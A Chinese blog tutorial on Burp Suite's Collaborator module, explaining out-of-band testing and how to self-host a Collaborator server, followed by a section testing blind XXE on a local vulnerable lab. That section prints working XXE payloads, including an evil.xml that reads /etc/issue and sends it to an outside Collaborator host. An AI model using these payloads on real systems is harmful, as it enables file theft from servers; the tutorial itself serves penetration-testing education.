burpsuite collaborato模块简介 dns log、http_https log、smtp_smtps log

最新推荐文章于 2024-08-06 16:35:03 发布
最新推荐文章于 2024-08-06 16:35:03 发布
阅读量6.5k 收藏 7
点赞数 4
原文链接:https://www.freebuf.com/sectool/193447.html
版权

Burp suite Pro自从v1.6.15版本开始引入了一种名为Burp Collaborator的模块,该模块的作用简单的说就是集合了DNS log, http_https log和smtp_smtps log的记录器,有点类似国内的Ceye平台。

为了解释这个模块,burp引入了In-band attack与 out-band attack(带内与带外攻击)两个概念,两者最主要的区别在于数据的流动方向和参与者的数量。

带内攻击(In-band attack)是平时最常见的渗透测试模型:

C7FA7BD0-9AF7-4139-9001-9E7CD5CFDB60 2.png

通常在渗透测试过程中,无论是手工还是利用工具都是由攻击端发送含有payload的数据给被攻击端,然后校验被攻击端返回的数据。在这个模型中角色只有两个,流量只有两个信道。

带外攻击(out-band attack)则是Burp Collaborator的攻击模型:

3FCA238E-6FB0-4C6F-8209-E933EDABE9EF 2.png

在带外攻击中由攻击者发送有害流量到被攻击者,但是数据不会直接返回而是转向了第三方服务器,最后返回被攻击者。在带外攻击中,数据走三个信道,有三个角色。当然有时候第三方服务器和攻击者可以在同一个终端上

Burp Collaborator是一个c/s结构的服务器。在Project options->Misc->Burp Collaborator Server是配置、校验Burp Collaborator服务器的地方。

而在Burp->Burp Collaborator Client是查看服务器信息的地方。

0x2 Burp Collaborator Server的搭建

Burp Collaborator 是一个C/S结构的应用程序,C自然是burp的客户端,S则可以根据情况而定。

0x01 Burp自带的服务器

381AD5A9-3930-4E9F-9AC9-746ED154537E 2.pngF108D99E-8459-4EB8-A8B6-D24C5A7E428D 2.pngBBB8F93D-3CB0-4E8B-AAE6-BCA4EF014D50 2.png4C15AEBD-2349-42AC-9182-1A2F8EE2864D 2.pngAE96D3AC-192F-4EFC-907F-993C6E17A9DC 2.png6CA98CDF-D923-4529-8357-03B41256D773 2.png

0x02自建服务器

环境在https://github.com/0xs1riu5/Writeup/tree/master/0x15Burp%E7%9A%84Collaborator%E4%BB%8B%E7%BB%8D

Burp Collaborator允许自建服务器,而且自建Collaborator服务器是不需要Pro授权的。自建服务器根据具体的网络分为两种。

0x001 内网

优点:方便灵活,在无网络的情况下(比如CTF比赛和内网测试)也可以使用。

缺点:无DNS log,https log和 smtps log。

搭建内网环境已经封装成了docker,前往Docker_Server_Inner目录下:

docker-compose build
docker-compose up -d

2A980454-8C06-4489-AFB4-EE9F87C6FD01 2.png58710DE1-F9AC-4F34-9860-EC0B67C28B78 2.pngF3735BC0-1F39-44E9-96BF-F141F9C184B7 2.png42977B01-575A-4B0A-B555-CF2FE1D56C60 2.pngB7A5F83E-31F8-42E5-8341-B57B04B03E92 2.png

0x002 外网

与内网搭建相比,外网就比较麻烦了。

所需材料:

VPS

域名:(从godaddy买的,然后移交到了cloudflare下进行控制),以my-subdomain-for-burp.luffy.com为例(假域名,需要改成自己的二级域名)

LetsEncrypt(免费的ssl加密证书)

Burp Suite Pro

Docker

0x0001 配置SSL证书

wget https://raw.githubusercontent.com/certbot/certbot/master/certbot-auto -O /usr/local/bin/certbot-auto
chmod a+x /usr/local/bin/certbot-auto
certbot-auto
certbot-auto certonly -d my-subdomain-for-burp.luffy.com -d *.my-subdomain-for-burp.luffy.com  --server https://acme-v02.api.letsencrypt.org/directory --manual --agree-tos  --email=you-email@qq.com --manual-public-ip-logging-ok --preferred-challenges dns-01

4037451E-9ECA-4D99-BF10-AB8FEC44176B 2.png

最后生成的证书默认是放在/etc/letsencrypt/目录下的。

然后前往cloudflare添加两个TXT记录: 

 

_acme-challenge.my-subdomain-for-burp.luffy.com -> en9Gf... _

acme-challenge.my-subdomain-for-burp.luffy.com -> Ffzzws... 

168E4A46-EA4E-4384-A3C8-ECB856F77A44 2.png

0x0002 Burp Collaborator Server的配置

A39F09DA-CC17-4CA7-AA28-90263E2E4F56 2.png

将域名和IP改成对应的二级域名和VPS公网IP地址:

docker-compose build
docker-compose up -d

16898577-11B4-4192-BD95-1D7FDA096EC4 2.png

0x0003 修改A记录和NS记录

1.NS记录指向ns1.my-subdomain-for-burp.luffy.com;

2.A记录指向公网IP。

BC3D1EB4-DAFB-4707-9164-CFFB2E3DD720 2.png09448415-E6DA-4B94-91D9-904F5E738544 2.png2CF5A69C-6408-4347-B876-B76572C1135A 2.png42178470-41B5-44CF-B002-7A4B65FF63DD 2.png

测试成功。

但是Burp Collaborator有一个缺点就是数据无法持久化,Burp Suite 不可能保存Collaborator的上下文。关闭client那么所有的数据就丢失了。现在也只能期待以后Burp会添加这方面的功能了。

现在为止有一个很好的折衷的方案就是在自建的服务器上开启DEBUG功能(我在docker中已经启用了),查看log信息,Burp自带的服务器就不可能实现了。

168E4A46-EA4E-4384-A3C8-ECB856F77A44 2.png

我把日志内容导向到了logs目录下的burp.log文件。

0x3 漏洞测试

0x01 XXE

前往Docker_vul_JavaVulnerableLab,这个XXE是回显式的,不过我按照盲注的方式测试:

docker-compose build
docker-compose up -d

启用之后访问 http://127.0.0.1:8080/vulnerability/Injection/xxe.jsp

0D2ADFB3-BF5E-48B9-BD73-57568AA5FD30.png

忙注的校验漏洞的PAYLOAD:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANY [<!ENTITY hello SYSTEM "http://cfv17n86l6ri6atl5kbebbxaa1gr4g.burpcollaborator.net">]><users><username>Neo&hello;</username><email>neo@matrix</email></users>

BF60D28F-DF32-49A3-9427-A23C8D56127D.png

实现文件读取。

新建一个evil.xml文件,放在web目录下:

<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % ent "<!ENTITY data SYSTEM 'http://tzwwz7vl66d1gir1nzihuc4hd8jy7n.burpcollaborator.net/%file;'>">

然后修改POST包:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxegsd76 SYSTEM "http://172.168.46.145:6080/evil.xml"> %xxegsd76; %ent; ]><users><username>Neo&data;</username><email>neo@matrix</email></users>

5754DB47-E47C-466B-80B2-60375DA3FA19.png

引用链接

Introducing Burp Collaborator | Blog

Burpsuite之Burp Collaborator模块介绍 - 小小leo - 博客园

Running Your Instance of Burp Collaborator Server - Fabio Pires

Deploying a private Burp Collaborator server

Burp Collaborator资源整合 - blacksunny - 博客园

DNSLog在渗透中的使用 | AdminTony's Blog

从 blind XXE 到读取根目录文件

XXE總結 - 掃文資訊

XXE总结(小部分自己的)

從 blind XXE 到讀取根目錄文件 - 掃文資訊

whatday
关注
《WEB安全渗透测试》(28)Burp Collaborator-dnslog外带技术
午夜安全
08-01 2609
1)打开BurpSuite,第一步选择“Projectoptions”,第二步选择“Misc”,第三步选择“UsethedefaultCollaboratorserver”(使用默认配置的外带服务器,如果想使用自己的服务器,可以在下面自由配置),第四步点击“Runhealthcheck..”测试外带服务器是否可以正常工作。这两个平台,他们是免费的DNSlog平台,我们利用它们可以监控DNS解析记录和HTTP访问记录,这对我们验证一些漏洞非常有帮助。...
入侵检测——BurpSuite
LainWith的博客
01-13 3588
目录介绍ping测试流量分析规则TCP型流量分析规则 介绍 BurpSuite里面有一个类似DNSlog的功能。它生成的域名中存在.burpcollaborator.net,可以利用此特征防御BurpSuite带外通道攻击。这种攻击方式还是蛮流行的,一周就能收到近10W条告警。 ping测试 普通ping 2. 获取测试结果 流量分析 查看icmp协议的内容,data部分没啥可看的 2. 查看dns协议的内容,及追踪流 看到了访问的地址 规则 规则检测.burpcollaborator.
一款强大的burpsuite漏洞扫描插件--gatherBurp
最新发布
lza20001103的博客
08-06 1089
一款强大的burpsuite漏洞扫描插件--gatherBurp
使用BurpSuiteCollaborator查找.Onion隐藏服务的真实IP地址
weixin_30321449的博客
03-07 293
本文转载!!!原文地址:http://www.4hou.com/technology/10367.html翻译来自:http://digitalforensicstips.com/2017/11/using-burp-suites-collaborator-to-find-the-true-ip-address-for-a-onion-hidden-service/(原文发自2017感恩...
BurpSuite-Collaborator插件介绍 附最新burp破解版地址
weixin_46137328的博客
02-17 3447
0x00:前情概述我们在做渗透测试的过程中发送完payload之后都能及时获得执行的结果吗?不一定。就比如说我们在留言处插入一条XSS语句“<script>alert(1)&...
Burp-Non-HTTP-Extension:Burp Suite的非HTTP协议扩展(NoPE)代理和DNS
02-26
NoPE代理 以前称为“ Burp-Non-HTTP-Extension” 联系人:@ null0perat0r 介绍 此扩展适用于Burp只说“不,我不会处理”的那些时间。 它实际上是没有正HTTP P rotocolËxtension代理的打嗝套房的首字母缩写。 此burp扩展为BurpSuite添加了两个新功能。 可配置的DNS服务器。 这会将所有DNS请求路由到Burp或预配置的主机。 这样可以更轻松地将移动或胖客户端流量发送到Burp。 您需要在BurpSuite中创建不可见的代理侦听器,以便Burp拦截HTTP流量,或者您可以使用此扩展的第二个功能来拦截二进制/非HTTP协议。 非HTTP MiTM拦截代理。 通过此扩展,您可以创建可用于MiTM服务器端服务的多个侦听端口。 它还使用Burp的CA证书,因此,如果已将浏览器或移动设备配置为使用此证书访问SSL / TLS请
快速搭建自用dnslog
寒星的博客
04-21 4220
快速搭建自用dnslog 前言 dnslog是常见的辅助验证漏洞的手段,为什么要自建dnslog? 第三方dnslog在一些特殊时期会受到一股神秘力量影响变得不稳定甚至不能用 有些业务或者信息不方便使用第三方平台 常见的dnslog平台会被安全产品检测到 网上已经有很多开源的dnslog平台,且有不少的dnslog搭建教程,但是看下来感觉还是有点麻烦,而且不容易集成到自己平台。对于个人来说,很多步骤其实是可以省略的。前几天原来的dnslog的域名到期了,又重新买了个新的重新搭建了一次。正好分享一下我是如
Burp Suite 社区版(burpsuite_community_windows-x64_v2022_5_1.exe)
06-20
Burp Suite 社区版(burpsuite_community_windows-x64_v2022_5_1.exe)适用于Windows系统,Burpsuite用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的...
Burp Suite社区版 (burpsuite_community_linux_v2021_10_3.sh)
01-09
Burp Suite社区版 (burpsuite_community_linux_v2021_10_3.sh适用于Linux系统) 可免费使用,是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。...
Burp Suite 社区版(burpsuite_community_windows-x64_v2021_10_3.exe)
01-09
Burp Suite 社区版(burpsuite_community_windows-x64_v2021_10_3.exe适用于Windows系统) 可免费使用,是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
使用这个BurpSuite插件,可以有效地帮助安全从业者在目标系统中识别出Log4j、Log4j2和Fastjson的使用,并评估是否存在安全风险。无论是老版还是新版的BurpSuite,该插件都能兼容,这意味着它具有良好的兼容性和实用...
Burp Suite 社区版(burpsuite_community_v2022.5.1.jar)
06-20
Burp Suite 社区版(burpsuite_community_v2022.5.1.jar),Burpsuite用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并...
Burpsuite新小功能
Vdieoo的博客
06-15 904
1.1.简要描述 Burpsuite作为web测试中的利器大家都知道,除了其核心的功能外还有部分小功能也是非常的不错,和大家分享一下。(小功能如使用错误,敬请指出,不胜感激。)下面以1.7.31的版本开始: 1.2.Infiltrator 这个功能可能大家不怎么使用不熟悉,我在官网中找到了相关的一些介绍。(注意请勿在生产环境中进行测试!) Infiltrator让Burp 能够检测输入到服务器端可能存在问题的api,既last (交互式应用程序安全测试)。 从Burp菜单中选择 Burp Infilt
Burp Collaborator 使用总结
热门推荐
发哥微课堂
04-07 1万+
0x00:使用原因 我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发,例如提交反馈表单,需要等管理员打开查看提交信息时才会触发,或者是盲注跨站,盲打 XSS 这种。再例如 SSRF,如果程序不进行回显任何信息,而只提示你输入的是否合法,那么也无法直接判断程序存在 SSRF 漏洞,我们可以叫盲 SSRF。再例如 XXE,引入外部文件时,如果程序也不返回任何...
burp的dns记录功能
aixuan9365的博客
12-28 2216
写个备忘。 先点copy复制url,然后生成的url就能用了。 一关就没了,比较鸡肋些,不适合持久的,适合马上就能见效果的那种。 转载于:https://www.cnblogs.com/yangxiaodi/p/8135316.html...
DNSLog漏洞探测(二)之常用DNSLog平台
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-10 4803
我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。
进阶必看 红客手把手教你玩透BurpSuite
MachineGunJoe666
04-23 632
Burp Suite 提供了一组键盘快捷键,可用于简化测试,可以通过。
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 222
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
burpsuite功能模块介绍
09-07
Burp Suite是一种流行的Web应用程序安全测试工具,它具有多个功能模块,用于执行各种安全测试任务。以下是Burp Suite的主要功能模块的简要介绍: 1. Proxy(代理):作为Burp Suite的核心模块之一,Proxy模块允许您拦截和修改HTTPHTTPS请求。您可以使用代理来检查传入和传出的请求,修改参数、头部或正文,并观察应用程序的响应。 2. Spider(爬虫):Spider模块用于自动发现应用程序中的链接和目录。它会遍历应用程序,收集所有可访问的页面,并将其添加到目标范围中供进一步测试使用。 3. Scanner(扫描器):Scanner模块用于自动执行漏洞扫描。它可以检测常见的Web应用程序漏洞,如SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)等。 4. Intruder(入侵者):Intruder模块可用于自动执行定制的攻击向量,例如暴力破解、参数枚举和字典攻击。您可以定义不同的payload和攻击参数,并对目标进行大规模攻击。 5. Repeater(重复器):Repeater模块允许您对单个请求进行手动修改和重复发送。使用它可以测试不同的请求参数和值,以检测应用程序的行为和漏洞。 6. Sequencer(序列器):Sequencer模块用于分析应用程序生成的随机数或会话令牌的质量。它会对收集的数据进行统计和熵分析,以帮助您评估其预测性和安全性。 7. Decoder(解码器):Decoder模块可用于对请求和响应中的数据进行编码和解码。它支持多种编码格式,例如URL编码、Base64编码和HTML实体编码。 8. Comparer(比较器):Comparer模块可用于比较两个请求或响应之间的差异。这对于发现应用程序中的潜在漏洞或错误非常有用。 这些功能模块使Burp Suite成为一种强大的工具,可帮助安全测试人员识别和验证Web应用程序中的漏洞,并提供建议和修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值